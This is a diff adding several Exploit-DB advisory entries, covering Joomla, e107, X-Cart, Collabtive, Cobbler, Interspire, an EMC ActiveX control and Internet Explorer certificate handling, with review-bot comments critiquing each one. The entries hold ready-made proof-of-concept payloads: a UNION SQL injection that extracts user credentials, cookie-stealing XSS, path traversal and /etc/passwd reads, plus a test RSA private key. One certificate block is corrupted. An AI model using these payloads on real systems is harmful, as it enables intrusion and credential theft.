+++ b/platforms/multiple/dos/33182.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/36114/info
+
+Live For Speed S2 is prone to a remote denial-of-service vulnerability because the application fails to handle exceptional conditions.
+
+An attacker could exploit this issue to restart races on vulnerable servers, resulting in a denial-of-service condition.
+
+Live For Speed S2 Z13 is vulnerable; other versions may also be affected.
+
+http://www.exploit-db.com/sploits/33182-1.zip
+http://www.exploit-db.com/sploits/33182-2.zip
\ No newline at end of file
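Review bot: 33255.txt says the attacker needs `physical access`, but the steps start with `xm create -c guest`, which requires a dom0 account allowed to run `xm` — a different and usually stronger precondition than physical access, and the one the summary should state. The steps edit the guest's kernel line interactively in pygrub (appending `1`, presumably to boot single-user), and read together with the summary the bypassed 'authentication' appears to be the guest's GRUB password rather than anything on the host, but the text never says so — confirm and state it. The version list `3.0.3, 3.3.0, and 3.3.1` also disagrees with the files.csv description `Xen 3.x pygrub`.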
diff --git a/platforms/php/webapps/33249.txt b/platforms/php/webapps/33249.txt
new file mode 100755
index 000000000..7460ce841
--- /dev/null
+++ b/platforms/php/webapps/33249.txt
@@ -0,0 +1,81 @@
+Vulnerability title: SQL Injection / SQL Error message in Collabtive
+application (CVE-2014-3246)
+CVE: CVE-2014-3246 (cordinated with
+Vendor: Collabtive
+Product: Collabtive (Open Source Project Management Software)
+Affected version: 1.12
+Fixed version: 2.0
+Reported by: Deepak Rathore
+Severity: Critical
+URL: http://[domain]/collabtive-12/managefile.php?action=showproject&id=2482
+Affected Users: Authenticated users
+Affected parameter(s): folder
+
+Issue details: The folder parameter appears to be vulnerable to SQL
+injection attacks. The payload 1%3d was submitted in the folder parameter,
+and a database error message was returned. You should review the contents
+of the error message, and the application's handling of other input, to
+confirm whether a vulnerability is present. The database appears to be
+MySQL.
+
+HTTP request:
+GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1
+Host: collabtive.o-dyn.de
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
+Firefox/29.0
+Accept: text/javascript, text/html, application/xml, text/xml, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+X-Prototype-Version: 1.6.0.3
+Referer:
+http://xxx/managefile.php?action=showproject&id=2482
+Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
+PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
+Connection: keep-alive
+
+Steps to replicate:
+1. Login into application
+2. Go to "Desktop" tab and click on "Add project"
+3. Fill the project details in the project form and click on "Add" button
+4. After creating a project go to "Files" tab and Intercept the request
+5. 
At "manageajax.php" file, replace "folder" parameter value with "1%3d"
+=====================
+Original Request
+=====================
+GET /manageajax.php?action=fileview_list&id=2482&folder=0 HTTP/1.1
+Host: collabtive.o-dyn.de
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
+Firefox/29.0
+Accept: text/javascript, text/html, application/xml, text/xml, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+X-Prototype-Version: 1.6.0.3
+Referer:
+http://xxx/managefile.php?action=showproject&id=2482
+Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
+PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
+Connection: keep-alive
+======================
+Attack Request
+======================
+GET /manageajax.php?action=fileview_list&id=2482&folder=1%3d HTTP/1.1
+Host: collabtive.o-dyn.de
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101
+Firefox/29.0
+Accept: text/javascript, text/html, application/xml, text/xml, */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+X-Prototype-Version: 1.6.0.3
+Referer:
+http://xxx/managefile.php?action=showproject&id=2482
+Cookie: PHPSESSID=ba83d29aab270a7926ea1be2e1f830be;
+PHPSESSID=ba83d29aab270a7926ea1be2e1f830be
+Connection: keep-alive
+======================
+6. Forward manipulated request to server and wait for response in browser
+7. SQL Error message is the proof of vulnerability.
+
+Tools used: Burp Suite proxy, Mozilla Firefox browser
diff --git a/platforms/php/webapps/33252.txt b/platforms/php/webapps/33252.txt
new file mode 100755
index 000000000..058466053
--- /dev/null
+++ b/platforms/php/webapps/33252.txt
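Review bot: The evidence in 33249.txt is a database error for `folder=1%3d`, and the text itself says to `review the contents of the error message ... to confirm whether a vulnerability is present`, so `Severity: Critical` is not backed by a demonstrated injection — no data extracted, no boolean- or time-based differential; add a confirming payload or lower the claim. The affected version is inconsistent within the patch (`1.12` here, `Collabtive 1.2` in files.csv), and the `CVE:` line is truncated at `(cordinated with`. The request was sent to `Host: collabtive.o-dyn.de`, which looks like a third-party demo instance rather than the reporter's own install, and a session cookie `PHPSESSID=ba83d29a...` is reproduced verbatim three times; redact host and cookie to `xxx` as the Referer already is.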
@@ -0,0 +1,45 @@
+# Exploit Title: Local File Inclusion vulnerability in cobbler
+
+# Exploit author: Dolev Farhi @f1nhack
+
+# Date 07/05/2014
+
+# Vendor homepage: http://www.cobblerd.org
+
+# Affected Software version: 2.4.x - 2.6.x
+
+# Alerted vendor: 7.5.14
+
+
+Software Description
+=====================
+Cobbler is a Linux installation server that allows for rapid setup of network installation environments. It glues together and automates many associated Linux tasks so you do not have to hop between many various commands and applications when deploying new systems, and, in some cases, changing existing ones.
+Cobbler can help with provisioning, managing DNS and DHCP, package updates, power management, configuration management orchestration, and much more.
+
+
+
+Vulnerability Description
+=========================
+Local file inclusion
+
+
+Steps to reproduce / PoC:
+=========================
+1.1. Login to Cobbler WebUI: http://ip.add.re.ss/cobbler_web/
+
+1.2. Under Profiles -> Create New Profile
+
+1.3. Create a new profile with some name, assign a distribution to it.
+
+1.4: in Kickstart value, enter /etc/passwd
+
+1.5. Save the profile
+
+1.6. Navigate again to Profiles page
+
+1.7. press on "View Kickstart" next to the new profile created.
+
+1.8. /etc/passwd content is shown.
+
+
+ <-> PoC Video: https://www.youtube.com/watch?v=vuBaoQUFEYQ&feature=youtu.be
\ No newline at end of file
diff --git a/platforms/php/webapps/33256.txt b/platforms/php/webapps/33256.txt
new file mode 100755
index 000000000..8d0e7ed79
--- /dev/null
+++ b/platforms/php/webapps/33256.txt
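Review bot: What 33252.txt demonstrates is an authenticated arbitrary file read — the `Kickstart` field accepts `/etc/passwd` and `View Kickstart` renders it (steps 1.4–1.8) — not file inclusion in the code-execution sense the title `Local File Inclusion` implies; retitle to `Authenticated Arbitrary File Read`. The write-up does not say which OS user the file is read as, nor whether the referenced path is passed through a template engine before display (if it is, impact could exceed disclosure) — state both or mark them unknown. files.csv files this under platform `php` although the PoC only references `/cobbler_web/`; confirm the tag.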
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36532/info
+
+e107 is prone to a security-bypass vulnerability and multiple cross-site scripting vulnerabilities.
+
+Successfully exploiting the security-bypass issue will allow an attacker to bypass the 'CAPTCHA' security mechanism. This may lead to other attacks.
+
+The attacker could exploit the cross-site scripting issues to execute arbitrary script code in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/search.php?in=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/search.php?ex=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/search.php?ep=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E http://www.example.com/search.php?be=%27%3Cscript%3Ealert(document.cookie)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/33262.txt b/platforms/php/webapps/33262.txt
new file mode 100755
index 000000000..33e9c3a48
--- /dev/null
+++ b/platforms/php/webapps/33262.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/36541/info
+
+Interspire Knowledge Manager is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
+
+Knowledge Manager 5 is vulnerable; other versions may also be affected.
+
+The following example URI is available:
+
+http://www.example.com/admin/de/dialog/file_manager.php?w=&p=/../../../../../../../../../../../../../etc/hosts
\ No newline at end of file
diff --git a/platforms/php/webapps/33266.txt b/platforms/php/webapps/33266.txt
new file mode 100755
index 000000000..4c4336047
--- /dev/null
+++ b/platforms/php/webapps/33266.txt
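Review bot: The last line of the e107 hunk packs all four search.php XSS URIs onto a single line (the hunk header's count of 9 confirms it is one line), which makes them easy to misread as one URL; put one per line, i.e. the `in=` URI, then the `ex=`, `ep=` and `be=` variants each on their own `+` line. The CAPTCHA security-bypass named in the third and fifth lines has no reproduction anywhere in the file, so a reader only gets the XSS half of the advisory; a one-line note such as `No PoC available for the CAPTCHA bypass; see the BID reference` would make that explicit. No affected e107 version range is given either.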
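Review bot: The example URI on the last line of the Interspire hunk targets `/admin/de/dialog/file_manager.php`, but the advisory never says whether that path is reachable without an administrator session; that one fact decides whether this is a pre-auth information disclosure or an admin-only one and should be stated, hedged if unknown (`Authentication requirement: not stated in the source advisory`). The empty `w=` parameter is also left unexplained, so a tester cannot tell whether it matters. A short line above the URI covering both points would make the entry self-contained.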
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36598/info
+
+The CB Resume Builder ('com_cbresumebuilder') component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The following example URI is available:
+
+http://www.example.com/index.php?option=com_cbresumebuilder&task=group_members&group_id=-666+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users--
\ No newline at end of file
diff --git a/platforms/php/webapps/33267.txt b/platforms/php/webapps/33267.txt
new file mode 100755
index 000000000..7a7d5b581
--- /dev/null
+++ b/platforms/php/webapps/33267.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36601/info
+
+X-Cart is prone to a cross-site scripting vulnerability in the email subscription component because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+http://www.example.com/[path]/customer/home.php?mode=subscribed&email=
+http://www.example.com/[path]/customer/home.php?mode=subscribed&email=<script>alert(document.cookie);//<</script>
+http://www.example.com/[path]/customer/home.php?mode=subscribed&email=<iframe src=http://www.google.com.br width=800>
\ No newline at end of file
diff --git a/platforms/windows/remote/33172.txt b/platforms/windows/remote/33172.txt
new file mode 100755
index 000000000..96eb9e2d6
--- /dev/null
+++ b/platforms/windows/remote/33172.txt
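Review bot: The UNION payload on the last line of the CB Resume Builder hunk hard-codes both the default `jos_` table prefix (`from+jos_users`) and a 15-column select list, and neither assumption is called out, so against an installation with a custom prefix or a different component build the exact URI simply returns nothing. I would add a line above it such as `Note: adjust the table prefix (jos_) and the column count (15) to the target installation`. The `password` column it extracts presumably yields stored hashes rather than plaintext, which is worth saying next to the impact sentence so the result is not over-reported.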
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/36061/info
+
+Source Engine is prone to a format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.
+
+An attacker may exploit this issue to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in a denial-of-service condition.
+
+Source Engine 3968 and prior builds are affected.
+
+http://www.exploit-db.com/sploits/33172-1.zip
+http://www.exploit-db.com/sploits/33172-2.zip
\ No newline at end of file
diff --git a/platforms/windows/remote/33263.html b/platforms/windows/remote/33263.html
new file mode 100755
index 000000000..401da97e7
--- /dev/null
+++ b/platforms/windows/remote/33263.html
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/36566/info
+
+The EMC Captiva PixTools Distributed Imaging ActiveX control is prone to multiple insecure-method vulnerabilities that affect the PDIControl.PDI.1 ActiveX control (PDIControl.dll).
+
+Successfully exploiting these issues allows remote attackers to create or overwrite arbitrary local files, which may lead to arbitrary code execution.
+
+PDIControl.dll 2.2.3160.0 is vulnerable; other versions may also be affected.
+
+<object classid='clsid:00200338-3D33-4FFC-AC20-67AA234325F3' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.SetLogLevel 1 test.SetLogFileName "c:\some.txt" test.WriteToLog 1, "Hello World!" End Sub </script>
+
+
+
diff --git a/platforms/windows/remote/33264.txt b/platforms/windows/remote/33264.txt
new file mode 100755
index 000000000..dcf77957f
--- /dev/null
+++ b/platforms/windows/remote/33264.txt
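Review bot: The only PoC material in the Source Engine hunk is the two external archives on its last two lines, `33172-1.zip` and `33172-2.zip`, with no description of what each contains and no checksum, so nothing in the repository lets a reader verify that the archive they later download is the one this entry refers to. Adding one line per archive naming its contents and its SHA-256 (computed from the archives at commit time) would make the entry verifiable. As committed it is an advisory summary rather than a self-contained exploit.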
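Review bot: The seven advisory lines before the `<object>` tag in 33263.html are bare text in an `.html` file, so a browser renders them as page content and the PoC is not a clean test page; wrap them in an HTML comment (`<!--` before the `source:` line and `-->` after the `PDIControl.dll 2.2.3160.0` line). The VBScript on the same line as the `<object>` tag is the entire finding — `SetLogFileName "c:\some.txt"` followed by `WriteToLog 1, "Hello World!"` — and both the destination path and the written string are literals supplied by the page, which is what makes the methods insecure; a comment next to the script, `<!-- page controls both the log path and the logged content -->`, would make that explicit. Keeping the whole markup on one line also makes the method sequence hard to read; one statement per line inside `Sub tryMe` would help.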
@@ -0,0 +1,49 @@
+source: http://www.securityfocus.com/bid/36577/info
+
+Microsoft Internet Explorer is a browser available for Microsoft Windows.
+
+Internet Explorer is prone to multiple security-bypass vulnerabilities because it fails to properly handle encoded values in X.509 certificates. Specifically, it fails to properly distinguish integer sequences that are then recognized as CN (common name) elements.
+
+Successful exploits allow attackers to perform man-in-the-middle attacks or impersonate trusted servers, which will aid in further attacks.
+
+PKCS#10 Request with Leading Zeroes:
+-----BEGIN CERTIFICATE REQUEST-----
+MIIBoTCCAQoCAQAwYTETMBEGA1UEChMKQmFkZ3V5IEluYzEXMBUGA1UEAxMOd3d3
+LmJhZGd1eS5jb20xGTAXBgNVBAsTEEhhY2tpbmcgRGl2aXNpb24xFjAUBgRVBIAD
+Ewx3d3cuYmFuay5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANmLyxoJ
+hdDkywSs9J2E70fg5Z2Wou29jKgCDPSFBKTH6syTzWArF84mF4B7a/3aPaaSTwYQ
+43siBhDkqYAanZFiLcZS6KVB53/FSsJwzz4+CpDcl7ky5utF/6Yfv86408PpFJvv
+5FWLLYBjLkyKE7ru5aMQqqnlZQIHOZc06VIZAgMBAAGgADANBgkqhkiG9w0BAQQF
+AAOBgQAt9IeKCGIK6WZRP7tcuAZoQBWbxXpASRozSSRWa5GRpLigTb69tggy7kyH
+bVHsbR3uL5j9wObTaU0EzFLXRDW5R/fQy1SBJLo3S7VXKgSJisMP9rBbuUIgLK6f
+tlLl4l4l8jJhYPSYkXge1wmyuXVnte53XGy67mBubATzWRk40w==
+-----END CERTIFICATE REQUEST-----
+PKCS#10 Request with 64 Bit Overflow:
+-----BEGIN CERTIFICATE REQUEST-----
+MIIBqjCCARMCAQAwajETMBEGA1UEChMKQmFkZ3V5IEluYzEXMBUGA1UEAxMOd3d3
+LmJhZGd1eS5jb20xGTAXBgNVBAsTEEhhY2tpbmcgRGl2aXNpb24xHzAdBg1VBIKA
+gICAgICAgIADEwx3d3cuYmFuay5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJ
+AoGBANmLyxoJhdDkywSs9J2E70fg5Z2Wou29jKgCDPSFBKTH6syTzWArF84mF4B7
+a/3aPaaSTwYQ43siBhDkqYAanZFiLcZS6KVB53/FSsJwzz4+CpDcl7ky5utF/6Yf
+v86408PpFJvv5FWLLYBjLkyKE7ru5aMQqqnlZQIHOZc06VIZAgMBAAGgADANBgkq
+hkiG9w0BAQQFAAOBgQC5avxpz3cfAqmmi2JDAnYBEwzgZfjIAAldk5X8HAX7mB9/https://ww
+w.defcon.org/
+77neRquSA5VhUQ8K8tdVQylBoaengqQrNpcWu/mTagm0RNaq3fBT6g9hmaGOHjli
+zbuMfUaH5eMAubxxc04uHPcYShjFzTcIASG8jPJqwIM/CHsSBTG5VlJX8iFquA==
+-----END CERTIFICATE REQUEST-----
+Private Key For 
Above Requests:
+-----BEGIN RSA PRIVATE KEY-----
+MIICXgIBAAKBgQDZi8saCYXQ5MsErPSdhO9H4OWdlqLtvYyoAgz0hQSkx+rMk81g
+KxfOJheAe2v92j2mkk8GEON7IgYQ5KmAGp2RYi3GUuilQed/xUrCcM8+PgqQ3Je5
+MubrRf+mH7/OuNPD6RSb7+RViy2AYy5MihO67uWjEKqp5WUCBzmXNOlSGQIDAQAB
+AoGAGnnQ9hJCnvG5Y5BJFQKgvHa6eztiCN0QyUG2oeuubP+Hq+4xCIs2EnjAU3qx
+4es1pZgY1fwoM0wowNWTa2vR0S5Sse0cVFoEzgOUNDE3bGyRRatjjZEFq6Q1oH3Y
+MdW9B4bvFsU7wf6MbGmDWFGVMLmBfBlqnSMu324Nfm3xdAECQQDyuHD1XCEtHvcG
++SQnngLVs5d6nMnQsA06nEotBLrIe8QESmanOoSEtIsr25zNyUtr6QZqHaldOYK+
+SzWf+KWRAkEA5XLB/En3KtQWd+R/jmd8f8ef4IdbmAg+BChoayJPUbI2tyER97MV
+xAUPN1SujN5C4B+cCz79hXk2+W5dnrOACQJBALO815EqVzsFiiJ0zkw0G59KrarT
+fjN2m2VCpT8vGG4sEJyox9mgYM+wrrqcl0JghOR1HBXqvydU1je6lAxRYbECQQCE
+QIw9riiQgCTfQE6ht1aUlGy7z2llDUMpxFzDe8g6b72H+sDPhGMEVGI740ylF6t2
+YeHgvZMFryOXzBycUBx5AkEAibS/zSPs08ix6LIaRYsok692TTqb49Cg+FuhJsx/
+eEegf1tZTACaCETRB1+edTW20MDwZukGs0WnZ9axgs/9PA==
+-----END RSA PRIVATE KEY-----
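Review bot: The second PEM block ("PKCS#10 Request with 64 Bit Overflow") is corrupted as committed: the line ending `…HAX7mB9/https://ww` and the following `w.defcon.org/` line contain `:` and `.`, which are not base64, so the request will not decode; dropping the `https://ww` suffix and the `w.defcon.org/` line leaves nine 64-character lines ending in `uA==`, which by length matches the `MIIBqj` (0x1aa-byte) header, so this looks like a paste artifact rather than missing data. The description "fails to properly distinguish integer sequences" says nothing about what the two requests contain: decoding the subject shows, after `CN=www.badguy.com`, an extra attribute whose OID is commonName (2.5.4.3) encoded non-minimally in the first request (`55 04 80 03`) and with an arc that overflows 64 bits back to 3 in the second (`55 04 82 80 80 80 80 80 80 80 80 03`), each carrying the value `www.bank.com`. One sentence stating that would tell a tester exactly what to reproduce. The key under `Private Key For Above Requests:` is a throwaway 1024-bit test key matching the two requests' modulus; say so (`Test key only — generated for these requests`) so it is not mistaken for leaked material.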